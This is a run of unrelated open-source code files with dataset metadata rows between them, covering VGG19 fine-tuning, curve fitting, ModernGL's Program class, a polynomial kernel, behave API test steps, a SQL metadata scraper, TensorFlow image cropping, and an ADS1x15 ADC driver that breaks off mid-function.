model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(512, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
# Add Fully Connected Layer
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1000, activation='softmax'))
# Loads ImageNet pre-trained data
model.load_weights('imagenet_models/vgg19_weights.h5')
# Truncate and replace softmax layer for transfer learning
model.layers.pop()
model.outputs = [model.layers[-1].output]
model.layers[-1].outbound_nodes = []
model.add(Dense(num_classes, activation='softmax'))
# Learning rate is changed to 0.001
sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
if __name__ == '__main__':
# Example to fine-tune on 3000 samples from Cifar10
img_rows, img_cols = 224, 224 # Resolution of inputs
channel = 3
num_classes = 10
batch_size = 16
nb_epoch = 10
# Load Cifar10 data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid = load_cifar10_data(img_rows, img_cols)
# Load our model
model = vgg19_model(img_rows, img_cols, channel, num_classes)
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_data=(X_valid, Y_valid),
)
# Make predictions
predictions_valid = model.predict(X_valid, batch_size=batch_size, verbose=1)
# Cross-entropy loss score
score = log_loss(Y_valid, predictions_valid)
| mit | -7,142,099,060,226,937,000 | 34.274194 | 145 | 0.665066 | false |
dvida/UWO-PA-Python-Course | Lecture 6/Task 1/L6_T1_solution.py | 1 | 1086 | from __future__ import print_function
import numpy as np
import scipy.optimize
import matplotlib.pyplot as plt
from TextFileParser import parseTextFile
def meteor_model(x, a, b, c, d):
""" Time vs. meteor lag. """
return a*np.exp(b*x) + c*x + d
if __name__ == "__main__":
# File name of the data file
file_name = 'meteor_data.txt'
# Load the data
star_data = parseTextFile(file_name, header=1)
# Convert to float numpy array
star_data = np.array(star_data, dtype=np.float64)
# Extract x and y data
x = star_data[:,0]
y = star_data[:,1]
# Fit the model
popt, pconv = scipy.optimize.curve_fit(meteor_model, x, y)
print(popt)
# Plot original data
plt.scatter(x, y)
# Generate new X data (original data is not sorted and not well distributed)
x_plot = np.linspace(x.min(), x.max(), 100)
# Plot fitted model
plt.plot(x_plot, meteor_model(x_plot, *popt))
plt.show()
# Calculate residuals
res = y - meteor_model(x, *popt)
plt.scatter(x, res)
plt.grid()
plt.show() | mit | 550,034,698,031,318,200 | 18.763636 | 80 | 0.617864 | false |
cprogrammer1994/ModernGL | moderngl/program.py | 1 | 7352 | from typing import Tuple, Union, Generator
from .program_members import (Attribute, Subroutine, Uniform, UniformBlock,
Varying)
__all__ = ['Program', 'detect_format']
class Program:
'''
A Program object represents fully processed executable code
in the OpenGL Shading Language, for one or more Shader stages.
In ModernGL, a Program object can be assigned to :py:class:`VertexArray` objects.
The VertexArray object is capable of binding the Program object once the
:py:meth:`VertexArray.render` or :py:meth:`VertexArray.transform` is called.
Program objects has no method called ``use()``, VertexArrays encapsulate this mechanism.
A Program object cannot be instantiated directly, it requires a context.
Use :py:meth:`Context.program` to create one.
Uniform buffers can be bound using :py:meth:`Buffer.bind_to_uniform_block`
or can be set individually. For more complex binding yielding higher
performance consider using :py:class:`moderngl.Scope`.
'''
__slots__ = ['mglo', '_members', '_subroutines', '_geom', '_glo', 'ctx', 'extra']
def __init__(self):
self.mglo = None #: Internal representation for debug purposes only.
self._members = {}
self._subroutines = None
self._geom = (None, None, None)
self._glo = None
self.ctx = None #: The context this object belongs to
self.extra = None #: Any - Attribute for storing user defined objects
raise TypeError()
def __repr__(self):
return '<Program: %d>' % self._glo
def __eq__(self, other) -> bool:
"""Compares two programs opengl names (mglo).
Returns:
bool: If the programs have the same opengl name
Example::
# True if the internal opengl name is the same
program_1 == program_2
"""
return type(self) is type(other) and self.mglo is other.mglo
def __getitem__(self, key) -> Union[Uniform, UniformBlock, Subroutine, Attribute, Varying]:
"""Get a member such as uniforms, uniform blocks, subroutines,
attributes and varyings by name.
.. code-block:: python
# Get a uniform
uniform = program['color']
# Uniform values can be set on the returned object
# or the `__setitem__` shortcut can be used.
program['color'].value = 1.0, 1.0, 1.0, 1.0
# Still when writing byte data we need to use the `write()` method
program['color'].write(buffer)
"""
return self._members[key]
def __setitem__(self, key, value):
"""Set a value of uniform or uniform block
.. code-block:: python
# Set a vec4 uniform
uniform['color'] = 1.0, 1.0, 1.0, 1.0
# Optionally we can store references to a member and set the value directly
uniform = program['color']
uniform.value = 1.0, 0.0, 0.0, 0.0
uniform = program['cameraMatrix']
uniform.write(camera_matrix)
"""
self._members[key].value = value
def __iter__(self) -> Generator[str, None, None]:
"""Yields the internal members names as strings.
This includes all members such as uniforms, attributes etc.
Example::
# Print member information
for name in program:
member = program[name]
print(name, type(member), member)
Output::
vert <class 'moderngl.program_members.attribute.Attribute'> <Attribute: 0>
vert_color <class 'moderngl.program_members.attribute.Attribute'> <Attribute: 1>
gl_InstanceID <class 'moderngl.program_members.attribute.Attribute'> <Attribute: -1>
rotation <class 'moderngl.program_members.uniform.Uniform'> <Uniform: 0>
scale <class 'moderngl.program_members.uniform.Uniform'> <Uniform: 1>
We can filter on member type if needed::
for name in prog:
member = prog[name]
if isinstance(member, moderngl.Uniform):
print("Uniform", name, member)
or a less verbose version using dict comprehensions::
uniforms = {name: self.prog[name] for name in self.prog
if isinstance(self.prog[name], moderngl.Uniform)}
print(uniforms)
Output::
{'rotation': <Uniform: 0>, 'scale': <Uniform: 1>}
"""
yield from self._members
@property
def geometry_input(self) -> int:
'''
int: The geometry input primitive.
The GeometryShader's input primitive if the GeometryShader exists.
The geometry input primitive will be used for validation.
'''
return self._geom[0]
@property
def geometry_output(self) -> int:
'''
int: The geometry output primitive.
The GeometryShader's output primitive if the GeometryShader exists.
'''
return self._geom[1]
@property
def geometry_vertices(self) -> int:
'''
int: The maximum number of vertices that
the geometry shader will output.
'''
return self._geom[2]
@property
def subroutines(self) -> Tuple[str, ...]:
'''
tuple: The subroutine uniforms.
'''
return self._subroutines
@property
def glo(self) -> int:
'''
int: The internal OpenGL object.
        This value is provided for debug purposes only.
'''
return self._glo
def get(self, key, default) -> Union[Uniform, UniformBlock, Subroutine, Attribute, Varying]:
'''
Returns a Uniform, UniformBlock, Subroutine, Attribute or Varying.
Args:
default: This is the value to be returned in case key does not exist.
Returns:
:py:class:`Uniform`, :py:class:`UniformBlock`, :py:class:`Subroutine`,
:py:class:`Attribute` or :py:class:`Varying`
'''
return self._members.get(key, default)
def release(self) -> None:
'''
Release the ModernGL object.
'''
self.mglo.release()
def detect_format(program, attributes, mode='mgl') -> str:
'''
Detect format for vertex attributes.
The format returned does not contain padding.
Args:
program (Program): The program.
attributes (list): A list of attribute names.
Returns:
str
'''
def fmt(attr):
'''
For internal use only.
'''
# Translate shape format into attribute format
mgl_fmt = {
'd': 'f8',
'I': 'u'
}
# moderngl attribute format uses f, i and u
if mode == 'mgl':
return attr.array_length * attr.dimension, mgl_fmt.get(attr.shape) or attr.shape
# struct attribute format uses f, d, i and I
elif mode == 'struct':
return attr.array_length * attr.dimension, attr.shape
else:
raise ValueError('invalid format mode: {}'.format(mode))
return ' '.join('%d%s' % fmt(program[a]) for a in attributes)
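# Example: a short sketch of combining detect_format() with a vertex array,
# assuming `ctx` is a moderngl Context and `buf` holds interleaved data for the
# listed attributes; shader sources are omitted.
#
#     prog = ctx.program(vertex_shader=..., fragment_shader=...)
#     fmt = detect_format(prog, ['in_vert', 'in_color'])   # e.g. '2f 3f'
#     vao = ctx.vertex_array(prog, [(buf, fmt, 'in_vert', 'in_color')])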
| mit | -7,031,265,398,693,830,000 | 31.104803 | 96 | 0.575218 | false |
charanpald/sandbox | sandbox/kernel/PolyKernel.py | 1 | 1730 |
import numpy
from sandbox.kernel.AbstractKernel import AbstractKernel
from sandbox.util.Parameter import Parameter
class PolyKernel(AbstractKernel):
"""
A class to find polynomial kernel evaluations k(x, y) = (<x, y> + b)^degree
"""
def __init__(self, b=1.0, degree=2):
"""
Initialise object with given value of b >= 0 and degree
:param b: kernel bias parameter.
:type b: :class:`float`
:param degree: degree parameter.
:type degree: :class:`int`
"""
self.setB(b)
self.setDegree(degree)
def evaluate(self, X1, X2):
"""
Find kernel evaluation between two matrices X1 and X2 whose rows are
examples and have an identical number of columns.
:param X1: First set of examples.
:type X1: :class:`numpy.ndarray`
:param X2: Second set of examples.
:type X2: :class:`numpy.ndarray`
"""
Parameter.checkClass(X1, numpy.ndarray)
Parameter.checkClass(X2, numpy.ndarray)
if X1.shape[1] != X2.shape[1]:
raise ValueError("Invalid matrix dimentions: " + str(X1.shape) + " " + str(X2.shape))
K = (numpy.dot(X1, X2.T) + self.b)**self.degree
return K
def setB(self, b):
"""
Set the b parameter.
:param b: kernel bias parameter.
:type b: :class:`float`
"""
Parameter.checkFloat(b, 0.0, float('inf'))
self.b = b
def setDegree(self, degree):
"""
Set the degree parameter.
:param degree: kernel degree parameter.
:type degree: :class:`int`
"""
Parameter.checkInt(degree, 1, float('inf'))
self.degree = degree | gpl-3.0 | 6,772,952,362,683,971,000 | 25.227273 | 97 | 0.574566 | false |
alphagov/backdrop | features/steps/read_api.py | 1 | 8202 | import datetime
import os
import re
from behave import given, when, then, step_matcher
from dateutil import parser
from flask import json
from hamcrest import assert_that, is_, is_not, matches_regexp, has_length, equal_to, \
has_item, has_entries, has_entry
import pytz
from features.support.api_common import ensure_data_set_exists
from features.support.stagecraft import create_or_update_stagecraft_service
FIXTURE_PATH = os.path.join(os.path.dirname(__file__), '..', 'fixtures')
TEST_STAGECRAFT_PORT = 3103
@given('the api is running in protected mode')
def step(context):
context.client.set_config_parameter('PREVENT_RAW_QUERIES', True)
@given('"{fixture_name}" is in "{data_set_name}" data_set')
def step(context, fixture_name, data_set_name):
ensure_data_set_exists(context, data_set_name)
fixture_path = os.path.join(FIXTURE_PATH, fixture_name)
with open(fixture_path) as fixture:
for obj in json.load(fixture):
for key in ['_timestamp', '_day_start_at',
'_week_start_at', '_month_start_at']:
if key in obj:
obj[key] = parser.parse(obj[key]).astimezone(pytz.utc)
context.client.storage().save_record(data_set_name, obj)
def get_data_set_settings_from_context_table(table):
def to_py(string_in):
if string_in == "None":
return None
else:
return json.loads(string_in)
return {row['key']: to_py(row['value']) for row in table}
@given('"{fixture_name}" is in "{data_set_name}" data_set with settings')
def step(context, fixture_name, data_set_name):
settings = get_data_set_settings_from_context_table(context.table)
ensure_data_set_exists(context, data_set_name, settings)
fixture_path = os.path.join(FIXTURE_PATH, fixture_name)
with open(fixture_path) as fixture:
for obj in json.load(fixture):
for key in ['_timestamp', '_day_start_at',
'_week_start_at', '_month_start_at']:
if key in obj:
obj[key] = parser.parse(obj[key]).astimezone(pytz.utc)
context.client.storage().save_record(data_set_name, obj)
@given('I have a record updated "{timespan}" ago in the "{data_set_name}" data_set')
def step(context, timespan, data_set_name):
now = datetime.datetime.utcnow()
number_of_seconds = int(re.match(r'^(\d+) seconds?', timespan).group(1))
timedelta = datetime.timedelta(seconds=number_of_seconds)
updated = now - timedelta
record = {
"_updated_at": updated
}
context.client.storage().save_record(data_set_name, record)
@given('I have a data_set named "{data_set_name}" with settings')
def step(context, data_set_name):
settings = get_data_set_settings_from_context_table(context.table)
ensure_data_set_exists(context, data_set_name, settings)
@given('Stagecraft is running')
def step(context):
create_or_update_stagecraft_service(context, TEST_STAGECRAFT_PORT, {})
@when('I go to "{query}"')
def step(context, query):
context.response = context.client.get(query)
@when('I send another request to "{query}" with the received etag')
def step(context, query):
etag = context.response.headers["ETag"]
context.response = context.client.get(query,
headers={"If-None-Match": etag})
def get_error_message(response_data):
message = ""
try:
message = json.loads(response_data).get('message', "")
except:
pass
return message
@then('I should get back a status of "{expected_status}"')
def step(context, expected_status):
assert_that(context.response.status_code, is_(int(expected_status)),
get_error_message(context.response.data))
@then('I should get a "{header}" header of "{value}"')
def step(context, header, value):
assert_that(context.response.headers.get(header), is_(value))
@then('I should get back the message "{message}"')
def step(context, message):
data = json.loads(context.response.data)
assert_that(data["message"], is_(message))
@then('I should get back the status of "{expected_status}"')
def step(context, expected_status):
data = json.loads(context.response.data)
assert_that(data["status"], is_(expected_status))
@then('I should get back the parse error "{parse_error}"')
def step(context, parse_error):
data = json.loads(context.response.data)
assert_that(data["message"], matches_regexp(parse_error))
@then('I should get back a message: "{expected_message}"')
def step(context, expected_message):
assert_that(
json.loads(context.response.data),
is_(json.loads(expected_message)))
@then(u'I should get back a warning of "{expected_warning}"')
def step(context, expected_warning):
response_object = json.loads(context.response.data)
assert_that(
response_object['warning'],
is_(expected_warning)
)
step_matcher("re")
@then('the JSON should have "(?P<n>\d+)" results?')
def step(context, n):
response_data = json.loads(context.response.data)
assert_that('data' in response_data, response_data.get('message', None))
the_data = response_data['data']
assert_that(the_data, has_length(int(n)))
step_matcher("parse")
def parse_position(nth, data):
match = re.compile(r'\d+').match(nth)
if match:
return int(match.group(0)) - 1
elif nth == "last":
return len(data) - 1
elif nth == "first":
return 0
else:
raise IndexError(nth)
@then('the "{nth}" result should be "{expected_json}"')
def step(context, nth, expected_json):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
expected = json.loads(expected_json)
if '_updated_at' in the_data[i]:
del the_data[i]['_updated_at']
assert_that(the_data[i], is_(expected))
@then('the "{nth}" result should have "{key}" equaling "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], equal_to(value))
@then('the "{nth}" result should have "{key}" equaling the integer "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], equal_to(int(value)))
@then('the "{nth}" result should have "{key}" with item "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], has_item(json.loads(value)))
@then('the "{nth}" result should have "{key}" with item with entries "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], has_item(has_entries(json.loads(value))))
@then('the "{nth}" result should have "{key}" with json "{expected_json}"')
def impl(context, nth, key, expected_json):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], is_(json.loads(expected_json)))
@then('the "{nth}" result should have a sub group with "{key}" with json "{expected_json}"')
def impl(context, nth, key, expected_json):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i]['values'],
has_item(
has_entry(key, json.loads(expected_json))))
@then('the "{header}" header should be "{value}"')
def step(context, header, value):
assert_that(context.response.headers.get(header), is_(value))
@then('the "{header}" header should not be empty')
def step(context, header):
assert_that(context.response.headers.get(header), is_not(None))
assert_that(context.response.headers.get(header), is_not(''))
@then(u'the error message should be "{expected_message}"')
def impl(context, expected_message):
error_message = json.loads(context.response.data)['message']
assert_that(error_message, is_(expected_message))
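# Example: an illustrative Gherkin scenario exercising the steps above; the
# fixture and data_set names are made up for the sketch.
#
#     Scenario: querying a data_set
#       Given "dinosaurs.json" is in "dinosaurs" data_set
#       When I go to "/dinosaurs?limit=3"
#       Then I should get back a status of "200"
#       And the JSON should have "3" results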
| mit | 3,936,186,195,960,056,000 | 32.477551 | 92 | 0.656059 | false |
GoogleCloudPlatform/datacatalog-connectors-rdbms | google-datacatalog-rdbms-connector/src/google/datacatalog_connectors/rdbms/scrape/sql_objects/sql_objects_metadata_scraper.py | 1 | 2069 | #!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from google.datacatalog_connectors.rdbms.common import constants
from google.datacatalog_connectors.rdbms.scrape import sql_objects
class SQLObjectsMetadataScraper:
def __init__(self, main_scraper):
self.main_scraper = main_scraper
def scrape(self, config, connection_args):
scraped_sql_object = {}
if connection_args and config and config.sql_objects_config:
sql_objects_config = config.sql_objects_config
for key, sql_object_config in sql_objects_config.items():
name = sql_object_config[constants.SQL_OBJECT_ITEM_NAME]
metadata_def = sql_object_config[
constants.SQL_OBJECT_ITEM_METADATA_DEF_KEY]
query = sql_object_config[constants.SQL_OBJECT_ITEM_QUERY_KEY]
logging.info(
'Scraping metadata for sql objects: {}'.format(key))
try:
dataframe = self.main_scraper.get_metadata_as_dataframe(
metadata_def, connection_args, query)
scraped_sql_object[name] = \
sql_objects.SQLObjectsMetadataNormalizer.normalize(
dataframe, metadata_def)
except: # noqa:E722
logging.exception(
'Failed to scrape sql object, ignoring: {}'.format(
key))
return scraped_sql_object
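# Example: a minimal sketch of driving the scraper, assuming `config` exposes a
# sql_objects_config mapping and `main_scraper` can execute the metadata
# queries; the surrounding names are illustrative.
#
#     scraper = SQLObjectsMetadataScraper(main_scraper)
#     scraped = scraper.scrape(config, connection_args)
#     # -> {'functions': <normalized metadata>, ...}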
| apache-2.0 | -1,006,289,879,503,530,100 | 37.314815 | 78 | 0.628806 | false |
antkillerfarm/antkillerfarm_crazy | python/ml/PIL/imageprocess.py | 1 | 1619 | import numpy as np
import tensorflow as tf
from PIL import Image
def save_img(sess, tensor, name):
tensor0 = tf.transpose(tensor, perm=[1, 2, 0])
res = sess.run(tensor0)
tensor1 = tensor0.eval()
im = Image.fromarray(tensor1.astype('uint8'))
im.save(name)
'''
im = Image.open("example_image_227x227.jpg")
im1 = im.resize((300,300))
n0 = np.array(im1)
print(n0.shape)
np.savetxt("input_0_out0_300_300_3.tensor", n0.flatten(), fmt='%f')
'''
n1 = np.loadtxt('input_0_out0_300_300_3.tensor', dtype=np.float32)
input0 = n1.reshape((300, 300, 3))
im2 = Image.fromarray(input0.astype('uint8'))
im2.save("2.jpg")
with tf.Session() as sess:
input1 = tf.transpose(input0, perm=[2, 0, 1])
res = sess.run(input1)
np.savetxt("input_0_out0_3_300_300.tensor", input1.eval().flatten(), fmt='%f')
out_crop = tf.slice(input1, [0, 75, 75], [3, 150, 150])
res = sess.run(out_crop)
out_crop0 = out_crop.eval()
np.savetxt("out_crop0.tensor", out_crop0.flatten(), fmt='%f')
save_img(sess, out_crop0, "3.jpg")
out_reverse = tf.reverse(out_crop0, [0])
res = sess.run(out_reverse)
out_reverse0 = out_reverse.eval()
np.savetxt("out_reverse0.tensor", out_reverse0.flatten(), fmt='%f')
save_img(sess, out_reverse0, "4.jpg")
mean = [127, 127, 127]
scale = 1.0 / 128
out_mean0 = tf.transpose(out_reverse0, perm=[1, 2, 0])
out_mean1 = (out_mean0 - mean) * scale
out_mean2 = tf.transpose(out_mean1, perm=[2, 0, 1])
sess.run(out_mean2)
np.savetxt("out_mean2.tensor", out_mean2.eval().flatten(), fmt='%f')
| gpl-3.0 | -4,133,155,640,879,254,000 | 33.977778 | 82 | 0.617048 | false |
Saint-Joe/weewx | bin/weewx/drivers/Adafruit_ADS1x15/Adafruit_ADS1x15.py | 1 | 32166 | #!/usr/bin/python
import time
import smbus
from Adafruit_I2C import Adafruit_I2C
# ===========================================================================
# ADS1x15 Class
#
# Originally written by K. Townsend, Adafruit (https://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code/tree/master/Adafruit_ADS1x15)
# Updates and new functions implementation by Pedro Villanueva, 03/2013.
# The only error in the original code was in line 57:
# __ADS1015_REG_CONFIG_DR_920SPS = 0x0050
# should be
# __ADS1015_REG_CONFIG_DR_920SPS = 0x0060
#
# NOT IMPLEMENTED: Conversion ready pin, page 15 datasheet.
# ===========================================================================
class ADS1x15:
i2c = None
# IC Identifiers
__IC_ADS1015 = 0x00
__IC_ADS1115 = 0x01
# Pointer Register
__ADS1015_REG_POINTER_MASK = 0x03
__ADS1015_REG_POINTER_CONVERT = 0x00
__ADS1015_REG_POINTER_CONFIG = 0x01
__ADS1015_REG_POINTER_LOWTHRESH = 0x02
__ADS1015_REG_POINTER_HITHRESH = 0x03
# Config Register
__ADS1015_REG_CONFIG_OS_MASK = 0x8000
__ADS1015_REG_CONFIG_OS_SINGLE = 0x8000 # Write: Set to start a single-conversion
__ADS1015_REG_CONFIG_OS_BUSY = 0x0000 # Read: Bit = 0 when conversion is in progress
__ADS1015_REG_CONFIG_OS_NOTBUSY = 0x8000 # Read: Bit = 1 when device is not performing a conversion
__ADS1015_REG_CONFIG_MUX_MASK = 0x7000
__ADS1015_REG_CONFIG_MUX_DIFF_0_1 = 0x0000 # Differential P = AIN0, N = AIN1 (default)
__ADS1015_REG_CONFIG_MUX_DIFF_0_3 = 0x1000 # Differential P = AIN0, N = AIN3
__ADS1015_REG_CONFIG_MUX_DIFF_1_3 = 0x2000 # Differential P = AIN1, N = AIN3
__ADS1015_REG_CONFIG_MUX_DIFF_2_3 = 0x3000 # Differential P = AIN2, N = AIN3
__ADS1015_REG_CONFIG_MUX_SINGLE_0 = 0x4000 # Single-ended AIN0
__ADS1015_REG_CONFIG_MUX_SINGLE_1 = 0x5000 # Single-ended AIN1
__ADS1015_REG_CONFIG_MUX_SINGLE_2 = 0x6000 # Single-ended AIN2
__ADS1015_REG_CONFIG_MUX_SINGLE_3 = 0x7000 # Single-ended AIN3
__ADS1015_REG_CONFIG_PGA_MASK = 0x0E00
__ADS1015_REG_CONFIG_PGA_6_144V = 0x0000 # +/-6.144V range
__ADS1015_REG_CONFIG_PGA_4_096V = 0x0200 # +/-4.096V range
__ADS1015_REG_CONFIG_PGA_2_048V = 0x0400 # +/-2.048V range (default)
__ADS1015_REG_CONFIG_PGA_1_024V = 0x0600 # +/-1.024V range
__ADS1015_REG_CONFIG_PGA_0_512V = 0x0800 # +/-0.512V range
__ADS1015_REG_CONFIG_PGA_0_256V = 0x0A00 # +/-0.256V range
__ADS1015_REG_CONFIG_MODE_MASK = 0x0100
__ADS1015_REG_CONFIG_MODE_CONTIN = 0x0000 # Continuous conversion mode
__ADS1015_REG_CONFIG_MODE_SINGLE = 0x0100 # Power-down single-shot mode (default)
__ADS1015_REG_CONFIG_DR_MASK = 0x00E0
__ADS1015_REG_CONFIG_DR_128SPS = 0x0000 # 128 samples per second
__ADS1015_REG_CONFIG_DR_250SPS = 0x0020 # 250 samples per second
__ADS1015_REG_CONFIG_DR_490SPS = 0x0040 # 490 samples per second
__ADS1015_REG_CONFIG_DR_920SPS = 0x0060 # 920 samples per second
__ADS1015_REG_CONFIG_DR_1600SPS = 0x0080 # 1600 samples per second (default)
__ADS1015_REG_CONFIG_DR_2400SPS = 0x00A0 # 2400 samples per second
__ADS1015_REG_CONFIG_DR_3300SPS = 0x00C0 # 3300 samples per second (also 0x00E0)
__ADS1115_REG_CONFIG_DR_8SPS = 0x0000 # 8 samples per second
__ADS1115_REG_CONFIG_DR_16SPS = 0x0020 # 16 samples per second
__ADS1115_REG_CONFIG_DR_32SPS = 0x0040 # 32 samples per second
__ADS1115_REG_CONFIG_DR_64SPS = 0x0060 # 64 samples per second
__ADS1115_REG_CONFIG_DR_128SPS = 0x0080 # 128 samples per second
__ADS1115_REG_CONFIG_DR_250SPS = 0x00A0 # 250 samples per second (default)
__ADS1115_REG_CONFIG_DR_475SPS = 0x00C0 # 475 samples per second
__ADS1115_REG_CONFIG_DR_860SPS = 0x00E0 # 860 samples per second
__ADS1015_REG_CONFIG_CMODE_MASK = 0x0010
__ADS1015_REG_CONFIG_CMODE_TRAD = 0x0000 # Traditional comparator with hysteresis (default)
__ADS1015_REG_CONFIG_CMODE_WINDOW = 0x0010 # Window comparator
__ADS1015_REG_CONFIG_CPOL_MASK = 0x0008
__ADS1015_REG_CONFIG_CPOL_ACTVLOW = 0x0000 # ALERT/RDY pin is low when active (default)
__ADS1015_REG_CONFIG_CPOL_ACTVHI = 0x0008 # ALERT/RDY pin is high when active
__ADS1015_REG_CONFIG_CLAT_MASK = 0x0004 # Determines if ALERT/RDY pin latches once asserted
__ADS1015_REG_CONFIG_CLAT_NONLAT = 0x0000 # Non-latching comparator (default)
__ADS1015_REG_CONFIG_CLAT_LATCH = 0x0004 # Latching comparator
__ADS1015_REG_CONFIG_CQUE_MASK = 0x0003
__ADS1015_REG_CONFIG_CQUE_1CONV = 0x0000 # Assert ALERT/RDY after one conversions
__ADS1015_REG_CONFIG_CQUE_2CONV = 0x0001 # Assert ALERT/RDY after two conversions
__ADS1015_REG_CONFIG_CQUE_4CONV = 0x0002 # Assert ALERT/RDY after four conversions
__ADS1015_REG_CONFIG_CQUE_NONE = 0x0003 # Disable the comparator and put ALERT/RDY in high state (default)
# Dictionaries with the sampling speed values
# These simplify and clean the code (avoid the abuse of if/elif/else clauses)
spsADS1115 = {
8:__ADS1115_REG_CONFIG_DR_8SPS,
16:__ADS1115_REG_CONFIG_DR_16SPS,
32:__ADS1115_REG_CONFIG_DR_32SPS,
64:__ADS1115_REG_CONFIG_DR_64SPS,
128:__ADS1115_REG_CONFIG_DR_128SPS,
250:__ADS1115_REG_CONFIG_DR_250SPS,
475:__ADS1115_REG_CONFIG_DR_475SPS,
860:__ADS1115_REG_CONFIG_DR_860SPS
}
spsADS1015 = {
128:__ADS1015_REG_CONFIG_DR_128SPS,
250:__ADS1015_REG_CONFIG_DR_250SPS,
490:__ADS1015_REG_CONFIG_DR_490SPS,
920:__ADS1015_REG_CONFIG_DR_920SPS,
1600:__ADS1015_REG_CONFIG_DR_1600SPS,
2400:__ADS1015_REG_CONFIG_DR_2400SPS,
3300:__ADS1015_REG_CONFIG_DR_3300SPS
}
  # Dictionary with the programmable gains
pgaADS1x15 = {
6144:__ADS1015_REG_CONFIG_PGA_6_144V,
4096:__ADS1015_REG_CONFIG_PGA_4_096V,
2048:__ADS1015_REG_CONFIG_PGA_2_048V,
1024:__ADS1015_REG_CONFIG_PGA_1_024V,
512:__ADS1015_REG_CONFIG_PGA_0_512V,
256:__ADS1015_REG_CONFIG_PGA_0_256V
}
# Constructor
def __init__(self, address=0x48, ic=__IC_ADS1015, debug=False):
# Depending on if you have an old or a new Raspberry Pi, you
# may need to change the I2C bus. Older Pis use SMBus 0,
# whereas new Pis use SMBus 1. If you see an error like:
# 'Error accessing 0x48: Check your I2C address '
# change the SMBus number in the initializer below!
self.i2c = Adafruit_I2C(address)
self.address = address
self.debug = debug
# Make sure the IC specified is valid
if ((ic < self.__IC_ADS1015) | (ic > self.__IC_ADS1115)):
if (self.debug):
print "ADS1x15: Invalid IC specfied: %h" % ic
return -1
else:
self.ic = ic
# Set pga value, so that getLastConversionResult() can use it,
# any function that accepts a pga value must update this.
self.pga = 6144
def readADCSingleEnded(self, channel=0, pga=6144, sps=250):
"Gets a single-ended ADC reading from the specified channel in mV. \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see datasheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
# With invalid channel return -1
if (channel > 3):
if (self.debug):
print "ADS1x15: Invalid channel specified: %d" % channel
return -1
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, single-shot mode
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_SINGLE
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init) it returns the value of the constant
    # otherwise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
